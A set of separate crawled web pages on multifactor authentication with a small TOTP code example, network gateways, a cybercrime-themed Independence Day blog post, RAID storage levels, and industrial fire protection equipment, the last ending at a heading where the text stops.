When hackers figure out a single password, they can access even more sensitive information. Single-factor authentication is especially dangerous for businesses supporting critical infrastructure, such as national security, economic stability, and public health.

Alternatives to Single-Factor Authentication
Passwords are still valuable security tools, especially when created to be strong and unique. To ensure thorough cybersecurity for your company, you should combine passwords with other credentials to form a sign-in method called multifactor authentication. Multifactor authentication uses several factors, such as:
- Something you know: Examples include strong passwords or passphrases.
- Something you have: A personal mobile device, like a smartphone, or a secure Bluetooth token are ideal options for this factor.
- Something you are: Biometrics such as face or voice recognition, retinal scans, movement patterns, or hand scans can be powerful factors.

Combining these factors is one of the best ways to ensure secure and accurate verification. Two-factor authentication is a common sign-in method for many websites and networks that requires users to have a password and a personal device that can confirm identity through SMS or a dedicated app; a minimal sketch of such a one-time-password factor appears below.

Improve Your Cybersecurity With Agio
Looking for more guidance on improving your company's cybersecurity? Agio has you covered. Learn more about our cybersecurity capabilities to see how we can help protect your data.
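To make the "something you have" factor concrete, here is a minimal sketch of time-based one-time passwords (TOTP), the mechanism behind most authenticator apps. It assumes the third-party pyotp library, and the account name and issuer are made-up illustrative values; a real deployment would store the secret server-side per user and verify codes at login.

```python
# pip install pyotp
import pyotp

# Provisioned once per user and shared with their authenticator app,
# typically via a QR code generated from the URI below.
secret = pyotp.random_base32()
totp = pyotp.TOTP(secret)

uri = totp.provisioning_uri(name="alice@example.com", issuer_name="ExampleCorp")
print("Enroll with:", uri)

code = totp.now()            # the 6-digit code the user's app displays
print("Verifies:", totp.verify(code))  # True within the 30-second window
```

Because the code changes every 30 seconds and is derived from a secret the attacker does not hold, a stolen password alone no longer grants access, which is the whole point of adding a second factor.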
<urn:uuid:f1f735c3-2dca-497a-be68-2b1f654cfb7d>
CC-MAIN-2024-38
https://agio.com/secure-alternatives-to-single-factor-authentication-and-password-managers/
2024-09-09T04:26:16Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651072.23/warc/CC-MAIN-20240909040201-20240909070201-00776.warc.gz
en
0.912657
576
2.96875
3
Definition: Network Gateway

A network gateway is a device or software that serves as a bridge between two networks, allowing data to flow between them. It acts as an entry and exit point, managing the data traffic and ensuring that it is properly routed to its destination. Gateways are essential components in networking, as they enable communication between different networks, including those with different protocols or architectures.

Understanding Network Gateways
A network gateway is a crucial element in any networking setup, whether it's a small home network or a large enterprise network. It facilitates the seamless transfer of data between networks that might otherwise be incompatible. This compatibility is achieved by converting data formats, protocols, and addressing schemes to ensure that information is correctly interpreted and delivered across different network environments.

Key Functions of a Network Gateway
Network gateways perform several vital functions:
- Protocol Translation: Gateways can translate different communication protocols to ensure that data can move freely between different network types. For instance, a gateway can convert a packet from an IPv4 network to be compatible with an IPv6 network.
- Data Routing: They determine the best path for data packets to travel from the source to the destination. This routing capability is essential for efficient and reliable network communication.
- Security: Gateways often incorporate security features such as firewalls, VPNs, and intrusion detection systems to protect the network from unauthorized access and cyber threats.
- Network Address Translation (NAT): This function allows multiple devices on a local network to be mapped to a single public IP address, conserving the number of IP addresses needed and adding a layer of security by hiding internal IP addresses from external view (a minimal sketch of this mapping appears at the end of this entry).
- Bandwidth Management: By controlling the flow of traffic, gateways can prioritize certain types of data and manage bandwidth usage to prevent congestion and ensure optimal network performance.

Types of Network Gateways
There are various types of network gateways, each serving specific purposes within a network:
- Internet Gateway: Connects a local network to the internet, managing the data traffic between the internal network and the global web.
- Enterprise Gateway: Used in corporate environments to connect different segments of a company's internal network, often incorporating advanced security and management features.
- Cloud Gateway: Facilitates connectivity between an on-premises network and cloud services, enabling the integration of cloud-based resources with local infrastructure.
- VoIP Gateway: Converts voice data from traditional telephony systems to IP-based networks, allowing for Voice over Internet Protocol (VoIP) communications.
- IoT Gateway: Connects Internet of Things (IoT) devices to the cloud or other networks, managing the data traffic and protocols used by various IoT devices.

Benefits of Using a Network Gateway
Implementing a network gateway in a network infrastructure offers several benefits:
- Interoperability: By translating protocols and data formats, gateways enable different network systems to communicate effectively, enhancing overall interoperability.
- Security: Gateways can provide robust security measures, such as encryption, firewalls, and intrusion detection, safeguarding the network from external threats.
- Scalability: As networks grow, gateways can help manage the increased data traffic and ensure seamless connectivity between new and existing network segments. - Performance Optimization: Gateways can manage bandwidth and prioritize traffic, ensuring that critical applications receive the necessary resources for optimal performance. - Simplified Network Management: Centralizing network traffic through a gateway simplifies network management and monitoring, allowing for more efficient administration and troubleshooting. Uses of Network Gateways Network gateways are used in various scenarios to facilitate communication and data transfer: - Connecting Different Networks: Gateways enable communication between networks with different architectures, such as a corporate network and the internet. - Enabling Remote Access: By acting as a point of entry, gateways allow remote users to securely access internal network resources via VPNs. - Facilitating Cloud Integration: Cloud gateways enable businesses to connect their local infrastructure to cloud services, leveraging the benefits of cloud computing. - Supporting VoIP Communications: VoIP gateways allow traditional phone systems to interact with modern IP-based networks, supporting voice and video calls over the internet. - Integrating IoT Devices: IoT gateways connect various IoT devices to networks, ensuring they can communicate and share data effectively. Features of Network Gateways Network gateways come with a range of features designed to enhance network performance and security: - Advanced Routing: Gateways can use sophisticated algorithms to determine the most efficient path for data packets, optimizing network performance. - Comprehensive Security: Features such as firewalls, encryption, and intrusion detection systems protect the network from unauthorized access and cyber threats. - Quality of Service (QoS): Gateways can prioritize certain types of traffic, ensuring that critical applications receive the necessary bandwidth and resources. - Scalability: Many gateways are designed to scale with the network, supporting additional devices and traffic as the network grows. - Management and Monitoring: Gateways often include tools for network management and monitoring, providing administrators with insights into network performance and potential issues. Implementing a Network Gateway When implementing a network gateway, several factors need to be considered: - Network Requirements: Assess the specific needs of your network, including the types of networks being connected and the expected data traffic. - Security Considerations: Ensure that the gateway includes necessary security features to protect the network from threats. - Performance Needs: Choose a gateway that can handle the expected data traffic and provide the required performance levels. - Scalability: Select a gateway that can scale with your network, supporting future growth and additional devices. - Compatibility: Ensure that the gateway is compatible with existing network hardware and software to avoid integration issues. Frequently Asked Questions Related to Network Gateway What is a network gateway? A network gateway is a device or software that serves as a bridge between two networks, allowing data to flow between them. It manages data traffic and ensures proper routing to its destination, enabling communication between different network protocols or architectures. What are the key functions of a network gateway? 
Key functions of a network gateway include protocol translation, data routing, security, network address translation (NAT), and bandwidth management. These functions ensure efficient, secure, and reliable data transfer between networks. What types of network gateways are there? Types of network gateways include Internet gateways, enterprise gateways, cloud gateways, VoIP gateways, and IoT gateways. Each type serves specific purposes, such as connecting local networks to the internet, integrating cloud services, or facilitating VoIP communications. What are the benefits of using a network gateway? Benefits of using a network gateway include interoperability between different network systems, enhanced security, scalability, performance optimization, and simplified network management. Gateways ensure seamless data transfer and protection from cyber threats. How do you implement a network gateway? Implementing a network gateway involves assessing network requirements, ensuring necessary security features, choosing a gateway that handles expected data traffic, ensuring scalability, and checking compatibility with existing network hardware and software.
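The NAT function listed among the key functions above is easiest to see with a small, self-contained sketch. The snippet below is purely illustrative and hedged accordingly: the class and field names are invented for this example (they do not come from any real gateway product), and real gateways do this bookkeeping in the kernel or in dedicated hardware. It simply shows the translation table that maps internal (private IP, port) pairs to distinct ports on one public address.

```python
# Illustrative sketch of NAT bookkeeping; all names are hypothetical.

class NatTable:
    def __init__(self, public_ip: str, first_port: int = 40000):
        self.public_ip = public_ip
        self.next_port = first_port
        self.outbound = {}   # (private_ip, private_port) -> public_port
        self.inbound = {}    # public_port -> (private_ip, private_port)

    def translate_outbound(self, private_ip: str, private_port: int):
        """Map an internal endpoint to a unique port on the public IP."""
        key = (private_ip, private_port)
        if key not in self.outbound:
            port = self.next_port
            self.next_port += 1
            self.outbound[key] = port
            self.inbound[port] = key
        return self.public_ip, self.outbound[key]

    def translate_inbound(self, public_port: int):
        """Map a reply arriving on the public IP back to the internal host."""
        return self.inbound.get(public_port)


if __name__ == "__main__":
    nat = NatTable(public_ip="203.0.113.10")
    # Two internal hosts share one public address.
    print(nat.translate_outbound("192.168.1.20", 51000))  # ('203.0.113.10', 40000)
    print(nat.translate_outbound("192.168.1.21", 51000))  # ('203.0.113.10', 40001)
    # A reply to public port 40001 is routed back to 192.168.1.21:51000.
    print(nat.translate_inbound(40001))
```

This also illustrates why NAT conserves addresses and hides internal hosts: only the single public IP is ever visible to the outside network.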
<urn:uuid:493a8791-bb40-4851-a988-6e179d450946>
CC-MAIN-2024-38
https://www.ituonline.com/tech-definitions/what-is-a-network-gateway/
2024-09-12T22:08:30Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651498.46/warc/CC-MAIN-20240912210501-20240913000501-00476.warc.gz
en
0.900639
1,459
3.9375
4
Yesterday the United States celebrated Independence Day, which marks the day that the 13 original colonies declared their independence from Great Britain. Many of the complaints were that the colonists were not treated fairly and their rights as English subjects were being undermined. Back in 1776, mass communication was a slow process. News took a while to get from town to town. Private correspondence took days or weeks to move across a state or country. If someone stole valuable information, it was a slow process to get it to those who could benefit. Today, mass communication is instantaneous. The Internet makes sharing pictures, videos, audio and text a breeze. The amount of information available to all of us has grown to staggering proportions in the last few years. Stealing it is a lot easier today and moving it around to interested parties is very simple. Today our digital rights are being undermined by criminal activity on the Internet. We need to declare our independence from this tyranny and regain a sense of security in our lives. Information security is not just for governments and big corporations. It's for all of us. Watch this great video about how information security has grown up with the Internet and take a few lessons from the tips at the end of it. Photo credit J.W.Photography
<urn:uuid:dde59fb0-0d42-4efe-8df4-7fbd5bcf83a8>
CC-MAIN-2024-38
https://en.fasoo.com/blog/independence-from-cybercrime/
2024-09-09T09:12:23Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651092.31/warc/CC-MAIN-20240909071529-20240909101529-00876.warc.gz
en
0.977618
255
2.921875
3
Technology, how we love it until something goes wrong and we end up yelling at our computer screens. If you've ever lost data, you know how much time, money, and headaches it can cost you to retrieve it, especially if you are a company. Data recovery doesn't have to be worrisome.
The acronym RAID, first used in 1988, stands for Redundant Array of Inexpensive (or Independent) Disks. RAID is an assembly of disk drives, also known as a "disk array", which operates as one storage unit. In general, the drives could be any storage system with random data access such as magnetic hard drives, optical storage, magnetic tapes, etc. RAID has several functions, which include providing a way of accessing multiple disks grouped together so that they appear as a single device, spreading data access out over these disks, which reduces the risk of losing data if one drive should fail, and improving access time.
Can RAID fail? RAID undoubtedly offers more data protection than non-RAID disk systems. However, the management of the disks and the data distribution across them can be complex. Complex redundant systems can suffer failure, most often not because of the technology used or the design of the array, but because these systems are incorrectly applied, leaving a single point of failure that can cause disastrous data loss. No matter how well designed or implemented the RAID system is, there is still a factor that can cause RAID data array problems: the human factor. The more complex the system, the higher the likelihood of mistakes. Note the following:
- Multiple drives can fail in an array.
- Arrays are normally boxed in a single case, so physical damage can affect multiple drives and the control electronics.
- Many people don't back up RAID systems because they're 'fault tolerant' - however they're not 'fault proof'.
Think of a RAID system as an insurance policy for your data, protecting you against drive failure. Drive failure entails employee downtime, lost sales, customer costs, lost opportunities, data restoration and re-entry costs, and intangible costs due in part to work day disruptions, not to mention the cost of RAID data recovery.
There are several ways to store data using the different RAID levels:
- RAID 0, also known as data striping, distributes data across drives, which results in higher data throughput. However, since it has no data redundancy, it does not protect against data loss.
- RAID 1, also known as drive mirroring, works by simultaneously copying data to a second drive so no data is lost if there is a drive failure.
- RAID 2 uses Hamming error correction codes and is proposed for use with drives which don't have built-in error detection.
- RAID 3 stripes data at a byte level across several drives, storing parity (a form of data protection used to recreate the data of a failed drive in a disk array) on a single drive.
- RAID 4 stripes data at a block level across several drives, with parity being stored on one drive. The parity information allows for recovery from the failure of any single drive.
- RAID 5 is similar to RAID 4 except for the fact that it distributes parity among the drives.
For more information see the article on "What is a RAID?".
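The parity idea behind RAID levels 3 to 5 can be demonstrated in a few lines of code. The sketch below is illustrative only and assumes simple byte-for-byte XOR parity (real controllers work on whole stripes and add their own metadata): it shows that when one "drive" is lost, its block can be rebuilt by XOR-ing the surviving blocks with the parity block.

```python
# Illustrative XOR parity, the principle used by RAID 3/4/5.
from functools import reduce

def xor_blocks(blocks):
    """XOR equal-length byte blocks together, column by column."""
    return bytes(reduce(lambda a, b: a ^ b, col) for col in zip(*blocks))

# Three data "drives" holding one 8-byte block each (made-up contents).
d0 = b"RAID dem"
d1 = b"o blocks"
d2 = b"01234567"

parity = xor_blocks([d0, d1, d2])        # what the parity drive would store

# Simulate losing drive 1 and rebuilding it from the survivors plus parity.
rebuilt_d1 = xor_blocks([d0, d2, parity])
assert rebuilt_d1 == d1
print(rebuilt_d1)                        # b'o blocks'
```

The same property is why a RAID 5 array survives a single drive failure but not two: with two blocks missing, the XOR equation no longer has a unique solution.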
<urn:uuid:d1a58861-8939-41b8-9d4e-f41f70351902>
CC-MAIN-2024-38
https://www.fortypoundhead.com/showcontent.asp?artid=21066
2024-09-14T06:31:47Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651559.58/warc/CC-MAIN-20240914061427-20240914091427-00476.warc.gz
en
0.947402
722
3.203125
3
The best way to fight fire is to prevent it. Each industry and occupancy must provide itself with the proper type and an adequate number of fire fighting equipment to combat, control and extinguish fire and explosion efficiently, in their industries and occupancies. – Mr. R. R. NAIR
Fire kills and seriously injures people, destroys plant, equipment and property and, last but not least, damages our environment. Rapid industrialization and technological advancement have introduced new materials that are flammable, toxic or both. Specialised occupancies such as high rise buildings, large warehouses, and huge storages of petroleum and other flammable liquids in storage tanks, spheres and bullets have all brought in serious fire and explosion hazards. The fire protection industry is continuously engaged in manufacturing various types of fire protection equipment, with research, development and innovation. Hence, there exists a large number of different types of fire fighting equipment, appropriately made to suit specific requirements. In this article a sincere effort is made to summarize the salient features of important equipment used in fire protection. The types of equipment are dealt with under three headings: Portable, Fixed and Mobile.
2. PORTABLE FIRE PROTECTION EQUIPMENT
2.1 Portable Fire Extinguisher :
Portable extinguishers are designed to cope with fires of limited size and are absolutely necessary even though the plant is equipped with automatic sprinklers, a fire water system with fixed monitors/hose reels, and fire engines. Though portable extinguishers are regarded as first aid fire-fighting appliances, they are very valuable if used promptly and efficiently in the early stages of a fire. In addition to their portability, the most important feature of these hand appliances is their immediate availability for use by one person or at the most by a small crew. Since their capacity is limited, their operational value depends upon the initial charge being sufficient to overcome and confine the fire, thereby averting a major fire. Many flammable material fires, potentially of a serious nature, have been put out by diligent use of several hand-operated extinguishers, with secondary protection provided by large capacity wheeled extinguishers. If extinguishers are to be relied upon, then they must be: (a) of the right type, in sufficient quantity, and easily accessible; (b) properly maintained; and (c) operable by area personnel. When selecting extinguishers, the materials in the processes involved and the nature of the hazard anticipated should be taken into consideration. For this purpose a proper understanding of the classification of fires and the suitability of portable appliances is necessary, which is given in IS 2190 – Code of Practice for Selection, Installation and Maintenance of First-Aid Fire Extinguishers. The Bureau of Indian Standards has also published a number of standards on fire extinguishers, some of them being IS 940, IS2171, IS2878, IS4862, IS5490, IS5896, IS6234, IS6382, IS7673, and IS10658. The number of fire extinguishers provided will depend upon the fire hazard of the materials. Compliance with the relevant rules / standards of the appropriate authorities, such as State Factories Rules, the National Building Code, Local Fire Brigade Norms, Insurance Association Rules, etc., also has to be ensured. The general principle is that extinguishers are readily available and in sufficient quantity, so that even if one fails, another is available within a short distance.
Rule 71-B (7) of the Maharashtra Factories Rules, 1963 gives the requirement of extinguishers. For example, in factories having more than 100 square meters of floor area and where fire may occur due to combustible materials other than flammable liquids, electrical equipment and ignitable metals, soda acid or equivalent portable extinguishers are required at the rate of one for every 500 square meters of area, spaced not more than 30 meters apart, subject to a minimum of one extinguisher. This means a person need move only about 15 meters to pick up an extinguisher. Extinguishers should be mounted in easily accessible places near entrances and walkway platforms on process units. These can be conveniently mounted on handrails, structural members, etc. On open process units, it is worthwhile to protect the extinguishers from the weather with a metal cover. Similarly, wheeled units should be protected with a metal box. Ensure that extinguishers are not kept near sources of heat. It is recommended that extinguishers installed in any one building or single occupancy shall be similar in shape and appearance and shall have the same method of operation as far as possible. Further, wherever possible, one suitable type should be provided where there is more than one risk, e.g. if there is a hazard due to both flammable liquid and electricity, we can provide dry chemical extinguishers instead of one foam type and one CO2 type. This will eliminate inadvertent use of the wrong type of extinguisher. It is important that extinguishers are properly maintained and kept in good operating condition at all times. For this, sufficient refills and spare extinguishers should be kept on hand. Complete guidance is given in the Indian Standard on maintenance, inspection and testing, which should be referred to. At least once a week, routine maintenance should be carried out – observe external appearance; check nozzle, cap, and plunger. Ensure the seal of the extinguisher is intact. If the seal is broken, then a thorough inspection is warranted. Once in three months an inspection of the extinguisher should be done – open it, inspect charges, plunger, nozzle cap, etc. Annually, a thorough inspection with testing and recharging should be done. Once we have selected the right type of extinguishers, installed them throughout the plant and maintained them properly, all personnel who work in a specified area should be able to operate the extinguishers quickly without any hesitation; that means systematic training should be arranged for all personnel. Training should cover both theory and demonstration. Each person should be asked to actually use the extinguishers, preferably on a demonstration fire in the training ground. The correct and safe method of use can be effectively taught, and the user will gain confidence and then will not hesitate to use one in an actual fire. This training can be conducted in groups of about 10. The time, money and effort put into the portable extinguisher system are worth it, since we may be able to put out all small fires, which results in the elimination of many potential large fires. We shall examine in detail some of the important types of extinguishers.
2.1.1. Gas Cartridge and Water Extinguishers :
The gas cartridge and water extinguisher uses plain water or a special anti-freeze solution, which is expelled by pressure from a small cartridge of carbon dioxide gas, released when the cartridge top is punctured. The only extinguishing action is the cooling action of the water. The cartridge-water extinguisher has a range of approximately 9 to 12 meters.
The capacity of the common size is 9 litres. The extinguisher may be used on Class A fires – ordinary combustibles (wood, textiles, rubbish). However, do not use these extinguishers on fires involving energized electrical equipment. This type of extinguisher is hung on a wall or post with the top not more than 1.5 meters above the floor. The user grasps the bottom handle with one hand and the nozzle and upper ring with the other. Upon reaching the fire, he bumps the projecting plunger to puncture the sealed cartridge of carbon dioxide inside the extinguisher. The stream of water is directed at the base of the flame. Once a year the gas cartridge should be removed from the extinguisher and weighed to check for loss of weight. The cartridge should be replaced if there is a loss of weight greater than 14.2 grams. The level of water should be checked at the filling mark. The extinguisher should be refilled with water and the cartridge renewed immediately after use. At the time of the annual inspection, the interior of the cylinder should be examined and the hose blown through to make sure it is clear and free of leaks.
2.1.2. Carbon Dioxide Extinguishers :
The carbon dioxide (CO2) extinguisher contains liquid carbon dioxide under approximately 60 kg/cm2 (850 psi) which, when released, turns into 'snow' that smothers fire by exclusion or displacement of air. The snow also exerts a temporary chilling effect, which aids in the prevention of immediate re-ignition. Depending on the size of the extinguisher, its range is 1 to 3 meters. Capacities of common sizes are 2.2 kg, 3 kg, 4.5 kg and 6.8 kg. Wheeled units of 9 kg and 22.5 kg are also available. CO2 extinguishers may be used on Class B and C fires (oils, gasoline, solvents and gaseous substances under pressure) and on fires of electrical equipment. To extinguish a fire, the extinguisher is removed from its bracket or stand and carried to the fire. The locking pin or sealing wire is removed or broken. To discharge, the horn is aimed at the base of the fire and the gas is released by opening the hand-wheel valve. To prevent re-flash, the snow should be spread over the burned surface even after the flames are extinguished. On flowing flammable material the snow should be worked back toward the source of the fire. The weight of carbon dioxide extinguishers should be checked monthly. If the weight loss is greater than 10 percent of the weight listed on the extinguisher, recharging by a company equipped to do it is necessary. Even though only partially discharged, extinguishers should be recharged immediately after use. The record cards should then be filled out and the extinguishers replaced. Every time the extinguisher is sent for recharging, the organization doing the recharging shall be asked to certify that the cylinder has been tested to 210 kg/cm2 (2980 psi) pressure before recharging. The snow released by CO2 is dry and non-toxic, and will not harm materials or fine machine parts. It does not conduct electricity and presents no clean-up problem. There is some danger of freezing if it is sprayed on the skin at close range. Recharging is not necessary so long as the weight is at least 90 per cent of the correct weight. The CO2 unit is especially suited for use on mobile equipment, on uneven burning surfaces, or in oil drums, paint spray booths and other confined spaces.
However, CO2 has many disadvantages, some of which are:
- Operators must have air to support life and should not enter rooms in which large quantities of carbon dioxide have been used until the rooms have been ventilated.
- Operators must approach close to the fire. The snow has limited penetrating power and is not suitable on deep-seated fires in wood, rubbish and the like.
- The snow gives no permanent insulating effect (like foam), but reapplication provides protection against re-ignition.
- It is not well suited to open fires outdoors because wind currents may dissipate the gas. The unit requires recharging with special equipment.
2.1.3. Dry Chemical Extinguishers :
The dry chemical extinguisher consists of an internally or externally mounted cartridge of carbon dioxide or nitrogen gas which, when the top is punctured or the cartridge valve is opened, expels the chemically processed bicarbonate of soda powder in the outer shell through the hose and nozzle. The action of the dry chemical extinguisher in putting out the fire is due to the blanketing effect of the powder, which is expelled when the gas cartridge is punctured, the evolution of CO2, and the consequent cooling effect when the CO2 is formed. For portable extinguishers, the range is 2 to 7.5 meters, depending upon capacity. Capacities of common sizes are 1 kg, 2 kg, 5 kg and 10 kg. Larger wheeled units of 25 kg, 50 kg and 75 kg are also available. The dry chemical unit may be used on Class B and C fires (oils, gasoline, solvents and gaseous substances under pressure) and on fires of electrical equipment. To extinguish a fire, the extinguisher is carried to the scene of the fire. After removing the locking pin, the dry chemical chamber is pressurised by puncturing the cartridge or opening the cartridge valve. The discharge is controlled by squeezing the nozzle handle. The flame is swept ahead by the discharged dust and backed up to its source. The pressure cartridge of dry chemical extinguishers should be weighed at least once a year. If the loss of weight of the cartridge is greater than 10 per cent, the cartridge should be replaced or recharged by a company equipped to do so. The condition of the powder should also be checked. The powder should be dry and not caked. To recharge the extinguisher, the empty gas cartridge is replaced with a full one, and the outer shell is refilled with the nominal weight of dry chemical. The operator should blow through the hose to be certain it is clear. After use, the cartridge is replaced and the cylinder refilled with the powder. All plugs and caps should be screwed tightly to prevent leakage. Record cards should be filled out, and the extinguisher replaced and protected from damage and corrosion. One fifth of the total number of extinguishers of this type on charge shall be selected for this test every year. The test shall be carried out by actually operating the extinguisher and watching for satisfactory performance. A pressure test shall be carried out once in three years, at a pressure of 25 kgf/cm2 (355 psi). The dry chemical powder is a non-conductor of electricity and, being non-toxic and non-corrosive, does not harm electrical or mechanical equipment or the operator. However, the fine powder deposit may present a difficult cleaning problem. Recharging can be done quickly without special equipment. Some extinguishers of this type have a limited range and the operator must approach close to the fire. The dust gives no permanent blanketing or insulating effect, and re-ignition is possible.
The extinguisher is best suited for installation in outdoor process units.
3. FIXED FIRE PROTECTION EQUIPMENT
3.1 Fire Pumps :
These are required for pressurising the hydrant system with firewater. A horizontal centrifugal pump is used where the water is stored in above-ground tanks and a vertical centrifugal pump where it is stored in underground tanks. The centrifugal fire pump has become the standard today. Its compactness, reliability, easy maintenance, hydraulic characteristics and variety of available drives – electric motors, steam turbines and internal combustion engines – have made the centrifugal fire pump ideal for this service. Discharge pressure is set by the minimum residual pressure requirement at the extremity of the system plus the system piping friction loss. Normally the residual pressure at the most remote hydrant should be at least 5.6 Kg/cm². This would indicate a pump discharge pressure of about 8.8 Kg/cm² in an adequately sized piping system. The selection of the drive for the pump is important. From the standpoint of low maintenance and ease of start-up and operation, electric drive is preferable. However, at the time of a power failure, an electric drive pump would not be able to operate. Hence, diesel or gasoline driven pumps are preferred. It is standard practice to provide a diesel driven pump as a standby fire pump. In case all the pumps are electrically driven, it is strongly recommended to provide an emergency power supply from captive power generation facilities such as D.G. sets. Jockey pumps are used to maintain pressure on the firewater system when it is not in use. The capacity of this pump should be sufficient to maintain pressure against leakage. Usually, an electric motor drive is provided with automatic start-up. The pump can be started manually from the control room or from the fire station and also from the local switch at the pump. There is also an arrangement for automatic start of the pump in case the system pressure falls below the set pressure. Generally, manual shutdown of the pump is provided. Fire pumps should be procured from reputed manufacturers. This is the most important item of equipment and hence needs proper selection, inspection, maintenance and regular testing.
3.2 Water Spray System :
Water spray systems can be of two types, viz. (i) medium velocity and (ii) high velocity. The medium velocity water spray system (1.4 bar to 3.5 bar) is essential and provides cooling protection for equipment such as storage tanks, spheres, bullets, etc. The high velocity water spray system (3.5 bar to 5 bar) is generally used for the protection of transformers.
3.3 Water Monitors :
Water is still the best medium for cooling large fires of combustible / flammable materials, particularly in process operating units, storage tanks, oil jetties, loading / unloading gantries, etc. Consider the provision of monitors covering an entire operating unit, fixed on the hydrants. By just starting the fire pump, one person can go around and open a number of monitors, raining a high flow of water very fast, in just four to five minutes after noticing a large fire. Hence it makes real sense to provide monitors liberally wherever the situation warrants their use. Water monitors with hand lever operation are available in three different types: fixed (stand post), portable, and trolley mounted. The well-designed constructions allow high flows and throw ranges, complete horizontal and good vertical traverses.
Further, the monitor can be locked indefinitely in the desired horizontal and vertical positions by operating two screw mechanisms. Provision of appropriate materials of construction and operating mechanisms can ensure trouble free operation. Though these monitors are developed for high flow, long range water throw with straight nozzles, they can be quickly converted to water fog or foam application by changing the nozzles, which will be supplied by the manufacturer on request.
3.3.1. Oscillating Water Monitors :
Large fires requiring wide coverage, or specific targets which have to be cooled for a long time, need tremendous effort, associated with high risk for fire fighting personnel as well. Further, there are limitations on providing large numbers of men and equipment for a long time. To meet this problem, water driven oscillating monitors have been developed. These are designed to provide an oscillating water or foam stream over a preset area of protection. They provide rapid blanketing for combating fires in aircraft hangars, on helicopter decks and in tank farms and other high risk areas. The advantages are excellent – water powered and hence safely usable in hazardous areas; wide oscillating arc and good elevation controls; long range horizontal throw; continuous unattended operation; and automatic starting at a fixed horizontal sweep and vertical elevation.
3.4. Water – Foam Monitors :
Foam is a permanent extinguishing agent and the best medium for containing, controlling and extinguishing large flammable or combustible liquid tank or spill fires. Foam is versatile, inasmuch as it can not only put out large fires but is also of great help in preventing vapour transmission for some time and in preventing fires on non-burning liquid surfaces in tanks or spills, by forming a foam blanket. No doubt it is of critical importance to start the foam attack immediately at the outbreak of fire, preferably in the very first few minutes. It is invariably possible to put out fires efficiently in their incipient stages. Delayed action will allow the fire to become big and serious, requiring large scale resources of manpower and equipment to control. Hence it makes good fire protection management sense to provide water – foam monitors with foam storage in the required locations, such as operating units, loading / unloading facilities, storage tanks, effluent treatment plants, oil jetties, airports, etc. There are different types and capacities of water – foam monitors, suitable for all kinds of fire fighting operations, some of them being:
- Water Foam Monitor – Stand Post Type (Fixed Type)
- Water Foam Monitor – Trolley Mounted Type
- Water Foam Monitor – Trailer Mounted Type (Without Foam Tank)
- Water Foam Monitor – Trailer Mounted Type (With Foam Tank)
3.5 Trailer Pump :
A trailer pump is useful for boosting pressure in a particular location. The lower pressure from the hydrant can be boosted for application at higher elevations such as towers, structures, etc. Diesel engine trailer pumps of 1800 Lit/min capacity are also available.
3.6. Hose Reels :
Hose reels are usually provided in addition to hydrants in buildings and operating units. Heavy duty rubber hose of 2.5 cm (1 inch) or 3.75 cm (1½ inch) size and about 15 meter length is kept wound on the drum of the hose reel, connected to a nozzle. The advantage is fast deployment, getting water onto the scene of the fire quickly.
3.7. Foam Protection for Storage Tanks :
Fires on storage tanks are by and large limited, but when a fire occurs in a storage tank of flammable or combustible liquids, it becomes a very serious hazard and can envelop the entire facility; particularly when the roof sinks, it is a disaster. Fixed foam protection facilities are provided for cone roof as well as floating roof tanks. It is probable that foam chambers could also be blown off. Hence, large capacity long-range monitors and fire engines with aerial platforms and foam pouring facilities have been successfully used on large sunken roof tanks. A large quantity of foam compound of the proper type and quality is a basic necessity for such conflagrations.
3.8. Automatic Sprinkler Installation :
Automatic sprinkler protection is a facility designed to discharge water automatically in sufficient density (litres/minute/m2) to control or extinguish a fire in its early stages. It consists of water discharge devices (sprinklers or sprinkler heads), one or more reliable sources of water at the desired pressure, valves to control water flow, piping to distribute and convey water to the sprinklers, and auxiliary equipment such as alarms and supervisory devices. The temperature rise during a fire activates the sprinkler heads, which discharge a spray of water over the protected area. Sprinkler systems, apart from controlling and extinguishing fires, also give out an alarm and alert people to take suitable action to tackle the fire. Automatic sprinkler protection has been widely used in a variety of locations. Examples of indoor usage are in factories, warehouses, office buildings, ships' holds, etc. Every sprinkler installation is tailor-made to suit various factors such as the features of the building construction, the dimensions of the compartment, the fire load of the occupancy, the possible type of fire, etc. Designing a sprinkler installation, therefore, calls for a thorough understanding of these factors. An installation which has not been properly designed cannot be expected to function in the desired manner. Extensive guidelines for the installation, care and maintenance of automatic sprinkler systems are given in the codes of the National Fire Protection Association (NFPA) of the U.S.A.
3.9. Detection Systems :
There are various devices used for the detection of fires. Some of the common devices are given below:
- Smoke detectors using ionization / photo-electric devices
- Heat detectors using fixed temperature / rate of temperature rise devices
- Flame detectors using infrared / ultraviolet / spark devices
- LHS cables using digital / analogue devices
- Gas detectors
- Manual call points
Detection systems, which will give an alarm on the local panel as well as the control room panel, can also be utilised in conjunction with automatic sprinklers, dry chemical powder systems, carbon dioxide systems, etc. These systems will have to be carefully designed with expertise for proper operation and effectiveness, keeping in clear view the occupancies involved.
4. MOBILE FIRE PROTECTION EQUIPMENT
4.1 Foam Tender :
A foam tender is provided in refineries, oil storages, chemical plants, etc. The foam tender is taken to the location of the tanks and foam is pumped through foam lines from the roadside. A foam tender consists of various components, and a typical tender can consist of:
(i) The foam tender is fabricated on a diesel chassis.
(ii) The fire pump has a capacity of 3200 LPM at 8 Kg/cm2.
(iii) The water tank has a capacity of 3000 Litres.
(iv) The foam tank has a capacity of 3000 Litres.
(v) A monitor is fitted on top of the tank.
(vi) A control panel with compound gauge, pressure gauge, engine throttle control, pump-to-foam proportioner, foam tank to foam selector valve, auxiliary foam connection, cooling valve, drain valve, pump to monitor, throttle and pump to hose reel.
4.2. Fire Tender :
A fire tender is similar to a foam tender but does not have foam-producing facilities. While the foam tender is provided in refineries, oil storage terminals, fertilizer plants, chemical plants, etc., the fire tender is usually provided by municipal / state fire brigades and by industries which do not have large storages of flammable / combustible liquids.
4.3. DCP Cum Foam Tender :
The DCP cum foam tender is capable of applying water, water-foam and dry chemical powder separately. The components include a Water Pump, Water Tank, Foam Tank, Foam Proportioning System, Foam Monitor, DCP Vessels, Gas Expelling System, Hose Reel and DCP Monitor.
4.4. Emergency Rescue Tender :
